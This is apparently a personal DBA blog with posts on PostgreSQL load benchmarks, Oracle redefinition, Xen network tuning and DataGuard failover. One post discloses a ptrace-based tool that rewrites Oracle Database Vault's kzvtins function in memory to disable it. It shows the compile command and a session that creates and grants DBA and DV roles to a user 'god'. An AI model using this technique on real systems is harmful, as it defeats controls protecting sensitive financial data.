Benchmarking PostgreSQL’s INSERT/COPY data loading performance (in one TCP stream)

January 6th, 2009

As everyone would expect “COPY FROM” wins, but in real conditions performance degradation seems to come from network/IPv4-stack along with PostgreSQL overhead, not CPU or I/O. PostgreSQL 8.3.5 (client libraries were 8.2.x) running on Xen VirtualMachine with 2 VCPU and 1GB RAM allocated from Quad Core P4 (2.4GHz), no other Xen VM (except of course dom0) was running during those tests. VM was on software RAID0 on 3xSATA2 7.2k RPM. Pgdata and xlog both were on the same RAID array, also PostgreSQL had fsync disabled (for performance). FS: ext3 with noatime, standard journal mode. More important PostgreSQL parameteres are below:

shared_buffers = 256MB
temp_buffers = 16MB
max_prepared_transactions = 10
work_mem = 4MB
maintenance_work_mem = 32MB
max_fsm_pages = 153600
fsync = off
wal_buffers = 512kB
archive_mode = off

Real test #1: Benchmark machine (my workstation, 1.5GHz Sempron, running X11, mostly idle) separated by 100mbps network (this is intended!: to simulate the real enviorniment in MAN network), average bench.pl CPU usage is about 10-15% (reported by top). During “INSERT” tests benchmarked database was *IDLE* (reported by vmstat was mostly 99-100 all the time) but network communication generates ~2-3k packet per seconds and ~1.5-1.9 Mbps. Bench.pl parameters were $items = 20000 (random items to INSERT/COPY) and $loops = 10 (tests to conduct to avoid bad results).

postgresql_ins_bench_100mbps

Artificial test #2: Benchmark running on the same machine as database (loopback communication only). This one really stresses CPU and IO, and it’s also taking some CPU cycles for performing benchmarking (i’ve plans to include Gigabit Ethernet in my lab ;) ) Bench.pl settings were $loops = 10 and $items = 40000.

postgresql_ins_bench_localhost

To see results please click on the above images. Long story quick: if you intend to perform more than several INSERT to be done to the same table consider using COPY statement (especially over slow networks, but also on high-bandwidth links to reduce PostgreSQL, TCP and OS overheads).

Legend:

  • ins_adhoc – each time for every INSERT there is prepare+execute being done at the DBI level
  • ins_prep – for each record prepared INSERT statement is being used
  • ins_func – for every record there is prepared & executed function that performs real INSERT
  • ins_func_prep – the same as “ins_func” but statement for executing function is prepared once
  • copy – COPY statement is being executed once for all records

Oracle Database Vault, not so 0-day anymore, privilege escalation using ptrace(2) from UNIX account

November 18th, 2008

It seems, that there are many misunderstandings surrounding Database Vault (Oracle product for protecting sensitive data from company employees – such like *credit card* records and other very sensitve financial data). Oracle’s marketing tried to always claim that is product is able to protect data from administrators(!), which of course is not true. Let’s take the following excerpt from Database Vault whitepapper:

“Privileged users can be prevented from access application data and separation-of-duty can be enforced across existing database administrators without a costly and time consuming least privilege exercise.”

Of course you could assume (as I did) here that DV protects against SYSDBA role too. That’s why this ora_dv_mem_off.c was spawn. After contacting Oracle secalert (greetz to them for discussions) in Februrary/March this year, it is clear that without in-depth reading of “Appendix C” from official DV documentation you won’t get full picture of the solution. DV was not to designed to protect from OS side – that’s the main technical point here – any database is still open for attack from OS side even with DV. And SYSDBA seems to be disabled from the OS side: that’s correct, you won’t be able to perform “sqlplus / as sysdba” even as Oracle software owner, you can as: “/ as sysoper” at most. In order to perform administrative tasks you require downtime (to relink). So any SYSDBA logged on UNX software owner account could defeat DV (and gain access to sensitive data) but this would be easily spotted. Here’s another solution, disabling DV on runtime. So enjoy, for free this time!

And oh, there is theoretical possibility that in future Oracle DV would run under several different OS-user/uids processes, and thus would be able to protect from SYSDBA’s too, but this would need MAJOR rearchitecture.

QuickNote to the buisness: NO, you are still not able to prevent watching cash flows by Database Admins ;)

Typical escalation (allowing to login in as SYSDBA and allowing to create users – thus excluding Security Admin from the job;) ):

[oracle@xeno ora_dv_mem_off]$ !gcc
gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty
ora_dv_mem_off.c: In function ‘locate_dv_func’:
ora_dv_mem_off.c:92: warning: initialization discards qualifiers from pointer
target type
ora_dv_mem_off.c:93: warning: initialization makes pointer from integer
without a cast

[oracle@xeno ora_dv_mem_off]$ ./ora_dv_mem_off
[17035] starting to trace sqlplus process (17036)
[***] NOW TYPE IN SQLPLUS: conn / as sysdba
[17035] execve() syscall in 17036

SQL*Plus: Release 10.2.0.3.0 – Production on Wed Feb 27 18:56:55 2008

Copyright (c) 1982, 2006, Oracle.  All Rights Reserved.

SQL> conn / as sysdba
[17035] clone() syscall in 17036, tracing orapid=17037
[17035] execve() syscall in 17037,
[17035] symbol “kzvtins” at 0xb185820
[***] sucessfuly validated function, DatabaseVault=1
[***] attempting to rewrite memory at 0xb185824
Connected.
SQL> create user god identified by abc;

User created.

SQL> grant dba,dv_admin,dv_owner,connect,resource to god;

Grant succeeded.

SQL>

I’m stunned (the most beautiful copyright notice ever)

November 11th, 2008

“Copyright (C) 2002 by Discovery Institute. All rights reserved.

In the interest of stimulating debate on the issues discussed in this book, the Discovery Institute gives permission for copies of this book to be freely downloaded from the Internet, distributed in electronic form to others, and printed out and distributed to others for non-commercial purposes as long as full credit is given to Discovery Institute and the test is not altered. Distribution, copying and printing for educational use is particularly encouraged,”

from the book “Are We Spiritual Machines? Ray Kurzweil vs. The Critics of Strong AI” (you can buy it from Amazon as I did – Ray’s books are worth 100x more than their listed price…)

My article about Extended RAC is finally public (on OTN)

November 11th, 2008

In case you would like to experiment with Extended RAC cluster my article on OTN should be helpful. Enjoy!

Raising Oracle VM’s maximal number of interfaces in domU

August 2nd, 2008

Just edit /boot/grub/menu.lst and add “netloop.nloopbacks=X”. Sample file after modification:

title Oracle VM Server vnull02
root (hd0,0)
kernel /xen.gz console=ttyS0,57600n8 console=tty dom0_mem=512M
module /vmlinuz-2.6.18-vnull02_8.1.6.0.18.el5xen ro root=/dev/md0 netloop.nloopbacks=8
module /initrd-2.6.18-vnull02_8.1.6.0.18.el5xen.img

DBMS_REDEFINITION – holy grail of Oracle

May 19th, 2008

DBMS_REDEFINITION allows an online redefinition of eg. table in heavy OLTP, 24×7 environment. Simple example of use(Oracle 10.2.0.3/Linux):

As normal user (in this case VNULL):
SQL> create table x ( id number(10) primary key, txt varchar2(16) );

Startup heavy DML traffic to database:
SQL> begin
for i in 100001..9000000 loop
insert /* +APPEND NOLOGGING */ into x (id, txt) values (i, NULL);
commit;
end loop;
end;
/

1
2
3
4
5

While the above snippet is running DBA has to ALTER TABLE to add single column (right now!), so he does:

SQL> alter table x add y char(1) default '1';
alter table x add y char(1) default '1'
*
ERROR at line 1:
ORA-00054: resource busy and acquire with NOWAIT specified

So how to ALTER that “X” table? Use DBMS_REDEFINITION:

SQL> execute dbms_redefinition.can_redef_table('VNULL', 'X');
PL/SQL procedure successfully completed.
SQL> create table VNULL.X_TMP as select id, txt, '1' as y from vnull.x where 0=1;
Table created.
SQL>
execute dbms_redefinition.start_redef_table('VNULL','X','X_TMP');
PL/SQL procedure successfully completed.
SQL>
execute dbms_redefinition.sync_interim_table('VNULL','X','X_TMP');
PL/SQL procedure successfully completed.
SQL>
execute dbms_redefinition.finish_redef_table('VNULL','X','X_TMP');
PL/SQL procedure successfully completed.
SQL> drop table vnull.x_tmp;
Table dropped.
SQL> desc vnull.x;
Name Null? Type
----------------------------------------- -------- ----------------------------
ID NUMBER(10)
TXT VARCHAR2(16)
Y CHAR(1)

OracleVM (XEN) network performance

March 31st, 2008

In OracleVM (virtualization product for x86 and x86_64 from Oracle, which is based on OpenSource XEN) one can pin individual VirtualMachines(later called just VMs) to dedicated CPU cores. This can give great potential win if XEN scheduler (dom0) doesn’t have to switch VMs between CPU or cores. Also you can modify default MTU (1500) settings for VMs, but more about this later.

I’ve performed some tests (on PC: QuadCore Q6600 4×2.4GHz + 8GB RAM, 1GB RAM per nfsX VM, 2GB RAM per vmracX VM, 3 SATA2 10kRPM disks in RAID0), here are the results (OracleVM 2.1 with Oracle Enterprise Linux 5):

  • using defaults (without VCPU pinning, dynamic VirtualCPU selection by XEN scheduler)
    [root@nfs2 ~]# ./iperf -c 10.98.1.101 -i 1 -u -b 2048M
    ------------------------------------------------------------
    Client connecting to 10.98.1.101, UDP port 5001
    Sending 1470 byte datagrams
    UDP buffer size: 256 KByte (default)
    ------------------------------------------------------------
    [ 3] local 10.98.1.102 port 1030 connected with 10.98.1.101 port 5001
    [ 3] 0.0- 1.0 sec 209 MBytes 1.75 Gbits/sec
    [ 3] 1.0- 2.0 sec 206 MBytes 1.73 Gbits/sec
    [ 3] 2.0- 3.0 sec 206 MBytes 1.73 Gbits/sec
    [ 3] 3.0- 4.0 sec 216 MBytes 1.82 Gbits/sec
    [ 3] 4.0- 5.0 sec 231 MBytes 1.93 Gbits/sec
    [ 3] 5.0- 6.0 sec 230 MBytes 1.93 Gbits/sec
    [ 3] 6.0- 7.0 sec 228 MBytes 1.91 Gbits/sec
    [ 3] 7.0- 8.0 sec 231 MBytes 1.94 Gbits/sec
    [ 3] 8.0- 9.0 sec 230 MBytes 1.93 Gbits/sec
    [ 3] 9.0-10.0 sec 222 MBytes 1.86 Gbits/sec
    [ 3] 0.0-10.0 sec 2.16 GBytes 1.85 Gbits/sec
    [ 3] Sent 1576401 datagrams
    [ 3] Server Report:
    [ 3] 0.0-10.0 sec 1.94 GBytes 1.66 Gbits/sec 0.026 ms 160868/1576400 (10%)
    [ 3] 0.0-10.0 sec 1 datagrams received out-of-order
    [root@nfs2 ~]#
  • after pinning:

    [root@quad OVS]# xm vcpu-list
    Name ID VCPU CPU State Time(s) CPU Affinity
    18_nfs1 4 0 0 -b- 220.5 0
    21_nfs2 7 0 1 -b- 264.1 1
    24_vmrac1 8 0 2 -b- 4.7 any cpu
    24_vmrac1 8 1 2 -b- 5.9 any cpu
    Domain-0 0 0 1 -b- 1242.9 any cpu
    Domain-0 0 1 0 -b- 224.2 any cpu
    Domain-0 0 2 2 r-- 71.8 any cpu
    Domain-0 0 3 3 -b- 60.2 any cpu

    Notice that 18_nfs1 and 21_nfs2 are pinned to diffrent cores. You would expect at first glance that this will give better performance, but…
    [root@nfs2 ~]# ./iperf -c 10.98.1.101 -i 1 -u -b 2048M
    ------------------------------------------------------------
    Client connecting to 10.98.1.101, UDP port 5001
    Sending 1470 byte datagrams
    UDP buffer size: 256 KByte (default)
    ------------------------------------------------------------
    [ 3] local 10.98.1.102 port 1030 connected with 10.98.1.101 port 5001
    [ 3] 0.0- 1.0 sec 105 MBytes 883 Mbits/sec
    [ 3] 1.0- 2.0 sec 107 MBytes 894 Mbits/sec
    [ 3] 2.0- 3.0 sec 108 MBytes 908 Mbits/sec
    [ 3] 3.0- 4.0 sec 118 MBytes 988 Mbits/sec
    [ 3] 4.0- 5.0 sec 130 MBytes 1.09 Gbits/sec
    [ 3] 5.0- 6.0 sec 112 MBytes 937 Mbits/sec
    [ 3] 6.0- 7.0 sec 110 MBytes 922 Mbits/sec
    [ 3] 7.0- 8.0 sec 111 MBytes 928 Mbits/sec
    [ 3] 8.0- 9.0 sec 121 MBytes 1.01 Gbits/sec
    [ 3] 9.0-10.0 sec 121 MBytes 1.02 Gbits/sec
    [ 3] 0.0-10.0 sec 1.12 GBytes 958 Mbits/sec
    [ 3] Sent 814834 datagrams
    [ 3] Server Report:
    [ 3] 0.0-10.0 sec 1.11 GBytes 957 Mbits/sec 0.004 ms 1166/814833 (0.14%)
    [ 3] 0.0-10.0 sec 1 datagrams received out-of-order

    As you can see there is no performance win in such scenario, XEN scheduler better knows how to utilise hardware
  • The last test is the worst scenario which can happen under XEN: overloaded hardware. So pinning both nfs systems to one core(0) gives following results:
    [root@quad OVS]# xm vcpu-list
    Name ID VCPU CPU State Time(s) CPU Affinity
    18_nfs1 4 0 0 -b- 226.1 0
    21_nfs2 7 0 0 -b- 268.7 0
    [..]

    again:

    [root@nfs2 ~]# ./iperf -c 10.98.1.101 -i 1 -u -b 2048M
    ------------------------------------------------------------
    Client connecting to 10.98.1.101, UDP port 5001
    Sending 1470 byte datagrams
    UDP buffer size: 256 KByte (default)
    ------------------------------------------------------------
    [ 3] local 10.98.1.102 port 1030 connected with 10.98.1.101 port 5001
    [ 3] 0.0- 1.0 sec 73.3 MBytes 615 Mbits/sec
    [ 3] 1.0- 2.0 sec 68.3 MBytes 573 Mbits/sec
    [ 3] 2.0- 3.0 sec 68.3 MBytes 573 Mbits/sec
    [ 3] 3.0- 4.0 sec 68.3 MBytes 573 Mbits/sec
    [ 3] 4.0- 5.0 sec 68.1 MBytes 572 Mbits/sec
    [ 3] 5.0- 6.0 sec 68.6 MBytes 575 Mbits/sec
    [ 3] 6.0- 7.0 sec 69.0 MBytes 579 Mbits/sec
    [ 3] 7.0- 8.0 sec 68.9 MBytes 578 Mbits/sec
    [ 3] 8.0- 9.0 sec 68.9 MBytes 578 Mbits/sec
    [ 3] 9.0-10.0 sec 66.6 MBytes 559 Mbits/sec
    [ 3] 0.0-10.0 sec 688 MBytes 577 Mbits/sec
    [ 3] Sent 490928 datagrams
    [ 3] Server Report:
    [ 3] 0.0-10.0 sec 680 MBytes 570 Mbits/sec 0.019 ms 6064/490927 (1.2%)
    [ 3] 0.0-10.0 sec 1 datagrams received out-of-order

WARNING EXPERIMENAL AND NOT VERY WELL TESTED (USE AT OWN RISK!):
MTU stands for Maximal Transmission Unit in network terminology. The bigger MTU the less overhead from TCP/IP stack, thus it can give great network results decreasing CPU utilisation for network intensive operations between VMs (in XEN between VMs packets traverse like this: domU_1 –> dom0(bridge) –> domU_2). Before altering MTU for Virtual Machines you should be familiar with the way they work in XEN. Go here for very good article explaining architecture of bridged interfaces in XEN. Before you can change MTU of bridge (sanbr0 in my case) you must change MTU for each VIFX.Y in XEN dom0 by running the following ip link set dev vifX.Y mtu 9000. List of those interfaces can be found by running: brctl show. Next you have to set MTU for bridge (in dom0): ip link set dev sanbr0 mtu 9000. Now you can use larger MTU in VMs. The test was performed on the same Quad box mentioned earlier, but now from vmrac2 VM node to one nfs VM node (yes, this is vmrac2 node is running Oracle RAC on NFS, but it is idle – no transactions were performed during this test):

[root@vmrac2 ~]# cd /u03
[root@vmrac2 u03]# mkdir temp
[root@vmrac2 u03]# cd temp/
# used NFS mount options
[root@vmrac2 temp]# mount | grep /u03
10.98.1.102:/data on /u03 type nfs (rw,bg,hard,nointr,tcp,nfsvers=3,timeo=300,rsize=32768,wsize=32768,actimeo=0,addr=10.98.1.102)
[root@vmrac2 temp]# ip link ls dev eth2
5: eth2: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:16:3e:6c:e7:67 brd ff:ff:ff:ff:ff:ff
[root@vmrac2 temp]# dd if=/dev/zero of=test1 bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 14.0485 seconds, 14.9 MB/s
# now we change MTU
[root@vmrac2 temp]# ip link set dev eth2 mtu 9000
[root@vmrac2 temp]# rm -f test1
[root@vmrac2 temp]# dd if=/dev/zero of=test2 bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 2.28668 seconds, 91.7 MB/s
[root@vmrac2 temp]# rm test2
rm: remove regular file `test2'? y
# let's test again to be sure
[root@vmrac2 temp]# dd if=/dev/zero of=test3 bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 2.14852 seconds, 97.6 MB/s
[root@vmrac2 temp]# rm test3
rm: remove regular file `test3'? y
# switch back to MTU=1500 to exclude other factors
[root@vmrac2 temp]# ip link set dev eth2 mtu 1500
[root@vmrac2 temp]# dd if=/dev/zero of=test4 bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 10.3054 seconds, 20.4 MB/s
# and again to MTU=9000
[root@vmrac2 temp]# ip link set dev eth2 mtu 9000
[root@vmrac2 temp]# dd if=/dev/zero of=test4 bs=1M count=200
[root@vmrac2 temp]# rm test4
rm: remove regular file `test4'? y
[root@vmrac2 temp]# dd if=/dev/zero of=test5 bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 2.37787 seconds, 88.2 MB/s
[root@vmrac2 temp]#

As you can see, we’ve increased sequential NFS write performance from something about ~20MB/s to ~90MB/s for NFS server and NFS client both in Oracle VM just by switching to larger MTU (I’ll try switching MTU to 16k or even 32k to be equal with NFS rsize/wsize).

One more notice: this is experimental and don’t try this at your’s OracleVM/XEN installations as this can be unsupported. I’m still experimenting with this, but I hope this trick won’t break anything ;)

p.s.#1 Simple iperf TCP bandwidth test on LAN with MTU=9000 (with 1500 it was ~1.9Gbps, as you could read earlier)
[root@nfs2 ~]# /root/iperf -c 10.98.1.101
------------------------------------------------------------
Client connecting to 10.98.1.101, TCP port 5001
TCP window size: 73.8 KByte (default)
------------------------------------------------------------
[ 3] local 10.98.1.102 port 37660 connected with 10.98.1.101 port 5001
[ 3] 0.0-10.0 sec 7.30 GBytes 6.27 Gbits/sec

p.s.#2 Yes, Oracle RAC 11g works on Oracle VM on NFS3 :)

B.Sc.

February 28th, 2008

It’s time to sum up several things:

  • I definetley need a rest(!). It’s my priority one. The problem is that I’m addicted to DOING something…
  • On 08.02.2008 I successfully got my Bachelor in Science. Basically we have implemented cluster using Solaris, Solaris Cluster, Oracle, Linux Virtual Servers, Apache2 and JBoss (I had to use Oracle DataGuard instead of RAC… as all of it was implemented in-home, see below for diagram). I’ll probably release webpanel for Solaris Jumpstart+FLARs (MySQL, PHP) some day under GPL. It was one of add-on projects for that engineering work.
  • Since about 15.02.2008 I’m studing for Master of Science on Computer Science, on Data Processing Technologies speciality track (emphasis is put on all databases related stuff)
  • Currently I’m preparing for Oracle Certified Associate (Database Administrator) exam…
  • It’s time to refresh my site after some period of inactivity.

Final architecture of cluster (it was my playground for testing some unknown for me software and features; it is NOT the real architecture I would suggest anyone to use ;) ):

Final architecture of cluster


Dilbert Engineer series:

Have fun! :)

[Polish only]: Wspolczuje uzytkownikom nasza-klasa.pl

January 8th, 2008

Choc sam nigdy nie uzywalem tego portalu (zarejestrowany nie jestem i co najlepsze – zamiaru rejestrowac sie nie mam) wspolczuje wszystkim korzystajacym z tego portalu… Przeczytalem, ze sie przenosili (do Poznania!) i pare rzeczy sobie sprawdzilem. Teraz troche konkretow(dlaczego wspolczuje ;) ):

[vnull@xeno ~]$ host d.nasza-klasa.pl
d.nasza-klasa.pl has address 89.149.244.93
d.nasza-klasa.pl has address 89.149.244.98
d.nasza-klasa.pl has address 89.149.244.99
d.nasza-klasa.pl has address 89.149.244.101
d.nasza-klasa.pl has address 89.149.244.112
d.nasza-klasa.pl has address 89.149.244.124
d.nasza-klasa.pl has address 89.149.244.183
d.nasza-klasa.pl has address 89.149.242.123
d.nasza-klasa.pl has address 89.149.242.124
d.nasza-klasa.pl has address 89.149.242.138
d.nasza-klasa.pl has address 89.149.242.139
d.nasza-klasa.pl has address 89.149.242.228
d.nasza-klasa.pl has address 89.149.244.49
d.nasza-klasa.pl has address 89.149.244.50
d.nasza-klasa.pl has address 89.149.244.51
d.nasza-klasa.pl has address 89.149.244.52
d.nasza-klasa.pl has address 89.149.244.53
d.nasza-klasa.pl has address 89.149.244.55
d.nasza-klasa.pl has address 89.149.244.78
d.nasza-klasa.pl has address 89.149.244.80
d.nasza-klasa.pl has address 89.149.244.82
d.nasza-klasa.pl has address 89.149.244.84
d.nasza-klasa.pl has address 89.149.244.88

Na d.nasza-klasa.pl przekierowuje zaraz po wejsciu na http://nasza-klasa.pl. Myslalem ze DNS load-balancing odszedl w zapomnienie ladnych pare lat temu… a tu prosze. Pytanie, jak przekierowuja przeciazony serwer – pojecia nie mam.

Dwa, ze:
[vnull@xeno ~]$ time HEAD http://nasza-klasa.pl
200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 08 Jan 2008 15:58:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Tue, 08 Jan 2008 15:59:14 GMT
Client-Peer: 89.149.242.124:80
Client-Response-Num: 1
Set-Cookie: nk_session=8E8-,Yx2dHFUp3tD2PZhXbO7aef; path=/; domain=.nasza-klasa.pl
real 0m19.332s
user 0m0.165s
sys 0m0.032s

Co mnie boli (a raczej nie mnie – tylko pewnie uzytkownikow tego portalu) to wymuszony brak cachowania? Zupelnie jakgdyby nigdy nie czytali http://highscalability.com/ .

Automatic failover with Oracle DataGuard (Fast-Start Failover)

December 5th, 2007

This post will demonstrate beautiful software… Oracle DataGuard :)

Quick intro for non-Oracle people out there… Oracle DataGuard is High Availability solution for Oracle Database. For thousands pages of documentation, concept guides, troubleshooting, HOWTOs about it please visit docs.oracle.com ;)

Some facts:
1) Max Availability mode (requirrement of Fail-Start Failover)
2) Flashback for database is on (also req.)
3) Physical standby
4) All configured from CLI (sqlplus and dgmgrl; no OEM)
5) Oracle version: 10gR2 EE(10.2.0.1)
6) All done on single host(2 instances + 1 observer + 1 listener)

Ok, let’s start observer (element which tests instances and decides when to failover to secondary database):

[oracle@xeno ~]$ export ORACLE_SID=xeno1
[oracle@xeno ~]$ dgmgrl
DGMGRL for Linux: Version 10.2.0.1.0 - Production
Copyright (c) 2000, 2005, Oracle. All rights reserved.
Welcome to DGMGRL, type "help" for information.
DGMGRL> connect sys/abc
Connected.
DGMGRL> show configuration verbose;
Configuration
Name: DGxeno
Enabled: YES
Protection Mode: MaxAvailability
Fast-Start Failover: ENABLED
Databases:
xeno1 - Primary database
xeno3 - Physical standby database
- Fast-Start Failover target
Fast-Start Failover
Threshold: 30 seconds
Observer: xeno.localdomain
Current status for "DGxeno":
SUCCESS
DGMGRL> START OBSERVER
<-- session hangs...

From another terminal we will insert some data:

[oracle@xeno ~]$ echo $ORACLE_SID
xeno1
[oracle@xeno ~]$ sqlplus vnull/abc
SQL*Plus: Release 10.2.0.1.0 - Production on Tue Dec 4 18:48:39 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning and Data Mining options
SQL> insert into dgtest values ('30000000');
1 row created.
SQL> commit;
Commit complete.
SQL>

Great, now we are going to prepare small holocaust for our xeno1 database… we just simply instant SIGKILL all processes of oracle xeno1:

[root@xeno ~]$ for P in `ps auxw | awk '/ora_[0-9a-z]+_xeno1/ { print $2 }' `; do kill -9 $P; done

Simple and efficient! ;)

Screenshot from DGMGRL observer:
DGMGRL observer failover

Now we can see from alert_xeno3.log the following:

[..]
<-- simulated failure of xeno1!
Tue Dec 4 19:01:19 2007
RFS[14]: Possible network disconnect with primary database
Tue Dec 4 19:01:19 2007
RFS[15]: Possible network disconnect with primary database
Tue Dec 4 19:01:19 2007
RFS[13]: Possible network disconnect with primary database
<-- failover starts!
Tue Dec 4 19:02:45 2007
ALTER DATABASE RECOVER MANAGED STANDBY DATABASE FINISH FORCE
Tue Dec 4 19:02:45 2007
Terminal Recovery: Stopping real time apply
Tue Dec 4 19:02:45 2007
MRP0: Background Media Recovery cancelled with status 16037
Tue Dec 4 19:02:45 2007
Errors in file /u01/app/oracle/admin/xeno3/bdump/xeno3_mrp0_7206.trc:
ORA-16037: user requested cancel of managed recovery operation
Managed Standby Recovery not using Real Time Apply
Recovery interrupted!
Recovered data files to a consistent state at change 2316040
Tue Dec 4 19:02:45 2007
Errors in file /u01/app/oracle/admin/xeno3/bdump/xeno3_mrp0_7206.trc:
ORA-16037: user requested cancel of managed recovery operation
Tue Dec 4 19:02:45 2007
MRP0: Background Media Recovery process shutdown (xeno3)
Tue Dec 4 19:02:46 2007
Terminal Recovery: Stopped real time apply
Tue Dec 4 19:02:46 2007
Attempt to do a Terminal Recovery (xeno3)
Tue Dec 4 19:02:46 2007
Media Recovery Start: Managed Standby Recovery (xeno3)
Managed Standby Recovery not using Real Time Apply
Terminal Recovery timestamp is '12/04/2007 19:02:46'
Terminal Recovery: applying standby redo logs.
Terminal Recovery: thread 1 seq# 95 redo required
Terminal Recovery: /u04/oracle/xeno3/standby_redo01.log
Identified End-Of-Redo for thread 1 sequence 95
Tue Dec 4 19:02:46 2007
Incomplete recovery applied all redo ever generated.
Recovery completed through change 2316041
Tue Dec 4 19:02:46 2007
Media Recovery Complete (xeno3)
Terminal Recovery: successful completion
Begin: Standby Redo Logfile archival
End: Standby Redo Logfile archival
Resetting standby activation ID 3036789101 (0xb501b96d)
Completed: ALTER DATABASE RECOVER MANAGED STANDBY DATABASE FINISH FORCE
Tue Dec 4 19:02:51 2007
ALTER DATABASE COMMIT TO SWITCHOVER TO PRIMARY WAIT WITH SESSION SHUTDOWN
Tue Dec 4 19:02:51 2007
ALTER DATABASE SWITCHOVER TO PRIMARY (xeno3)
If media recovery active, switchover will wait 900 seconds
Standby terminal recovery start SCN: 2316040
SwitchOver after complete recovery through change 2316041
Online log /u04/oracle/xeno3/redo01.log: Thread 1 Group 1 was previously cleared
Online log /u04/oracle/xeno3/redo02.log: Thread 1 Group 2 was previously cleared
Standby became primary SCN: 2316039
Converting standby mount to primary mount.
Tue Dec 4 19:02:51 2007
Switchover: Complete - Database mounted as primary (xeno3)
Completed: ALTER DATABASE COMMIT TO SWITCHOVER TO PRIMARY WAIT WITH SESSION SHUTDOWN
Tue Dec 4 19:02:51 2007
ARC6: STARTING ARCH PROCESSES
Tue Dec 4 19:02:51 2007
ALTER SYSTEM SET standby_archive_dest='' SCOPE=BOTH SID='xeno3';
Tue Dec 4 19:02:51 2007
ARC7: Becoming the 'no SRL' ARCH
Tue Dec 4 19:02:51 2007
ALTER SYSTEM SET log_archive_dest_1='location="/u04/oracle/xeno3/arch"','valid_for=(ONLINE_LOGFILE,ALL_ROLES)' SCOPE=BOTH SID='xeno3';
Tue Dec 4 19:02:51 2007
ALTER SYSTEM SET log_archive_dest_state_1='ENABLE' SCOPE=BOTH SID='xeno3';
Tue Dec 4 19:02:51 2007
ALTER DATABASE SET STANDBY DATABASE TO MAXIMIZE AVAILABILITY
Tue Dec 4 19:02:51 2007
Completed: ALTER DATABASE SET STANDBY DATABASE TO MAXIMIZE AVAILABILITY
Tue Dec 4 19:02:51 2007
ALTER DATABASE OPEN
Tue Dec 4 19:02:51 2007
Assigning activation ID 3036795877 (0xb501d3e5)
LGWR: Primary database is in MAXIMUM AVAILABILITY mode
Tue Dec 4 19:02:51 2007
Destination LOG_ARCHIVE_DEST_2 is SYNCHRONIZED
LGWR: Destination LOG_ARCHIVE_DEST_1 is not serviced by LGWR
Tue Dec 4 19:02:51 2007
ARCa: Archival started
ARC6: STARTING ARCH PROCESSES COMPLETE
ARCa started with pid=13, OS id=7969
LNSb started with pid=29, OS id=7971
Error 12514 received logging on to the standby
Tue Dec 4 19:02:58 2007
Errors in file /u01/app/oracle/admin/xeno3/bdump/xeno3_lgwr_6565.trc:
ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
Tue Dec 4 19:02:58 2007
LGWR: Error 12514 verifying archivelog destination LOG_ARCHIVE_DEST_2
Tue Dec 4 19:02:58 2007
Destination LOG_ARCHIVE_DEST_2 is UNSYNCHRONIZED
LGWR: Continuing...
Thread 1 advanced to log sequence 97
LGWR: Waiting for ORLs to be archived...
LGWR: ORLs successfully archived
Thread 1 opened at log sequence 97
Current log# 2 seq# 97 mem# 0: /u04/oracle/xeno3/redo02.log
Successful open of redo thread 1
Tue Dec 4 19:03:01 2007
MTTR advisory is disabled because FAST_START_MTTR_TARGET is not set
Tue Dec 4 19:03:01 2007
SMON: enabling cache recovery
Tue Dec 4 19:03:02 2007
Successfully onlined Undo Tablespace 1.
Dictionary check beginning
Dictionary check complete
Tue Dec 4 19:03:02 2007
SMON: enabling tx recovery
Tue Dec 4 19:03:02 2007
Database Characterset is WE8ISO8859P1
replication_dependency_tracking turned off (no async multimaster replication found)
Starting background process QMNC
QMNC started with pid=29, OS id=7973
Tue Dec 4 19:03:03 2007
LOGSTDBY: Validating controlfile with logical metadata
Tue Dec 4 19:03:03 2007
LOGSTDBY: Validation complete
Tue Dec 4 19:03:04 2007
Completed: ALTER DATABASE OPEN
[..]


[oracle@xeno ~]$ export ORACLE_SID=xeno3
[oracle@xeno ~]$ dgmgrl
DGMGRL for Linux: Version 10.2.0.1.0 - Production
Copyright (c) 2000, 2005, Oracle. All rights reserved.
Welcome to DGMGRL, type "help" for information.
DGMGRL> connect sys/abc
Connected.
DGMGRL> show configuration;
Configuration
Name: DGxeno
Enabled: YES
Protection Mode: MaxAvailability
Fast-Start Failover: ENABLED
Databases:
xeno1 - Physical standby database (disabled)
- Fast-Start Failover target
xeno3 - Primary database
Current status for "DGxeno":
Warning: ORA-16608: one or more databases have warnings
DGMGRL> show database xeno3;
Database
Name: xeno3
Role: PRIMARY
Enabled: YES
Intended State: ONLINE
Instance(s):
xeno3
Current status for "xeno3":
Warning: ORA-16817: unsynchronized Fast-Start Failover configuration
DGMGRL> show database xeno1;
Database
Name: xeno1
Role: PHYSICAL STANDBY
Enabled: NO
Intended State: ONLINE
Instance(s):
xeno1
Current status for "xeno1":
Error: ORA-16661: the standby database needs to be reinstated
DGMGRL>

We should check now our data:

[oracle@xeno ~]$ export ORACLE_SID=xeno3
[oracle@xeno ~]$ sqlplus vnull/abc
SQL*Plus: Release 10.2.0.1.0 - Production on Tue Dec 4 19:16:17 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning and Data Mining options
SQL> select * from dgtest;
ID
----------
[..]
777
30000000 <--- our data
[..]

DataGuard saved the day :)

Oracle’s EM Grid Control on CentOS5/RHEL5: libdb.so.2 issue and resolution

November 25th, 2007

CentOS5 and RHEL5 comes without libdb.so.2 library (old Sleepycat database software). The problem is that there is no RPM for this library in the repositories (newest is only compat-db-4.3 which provides libdb4-3.so). Oracle’s EM installer fails about libdb.so.2 with:

libdb.so.2 missing on CentOS5/RHEL5

Resolution which worked for me was to install Redhat 7.3 db1 package(!). Binary compability seems to work:

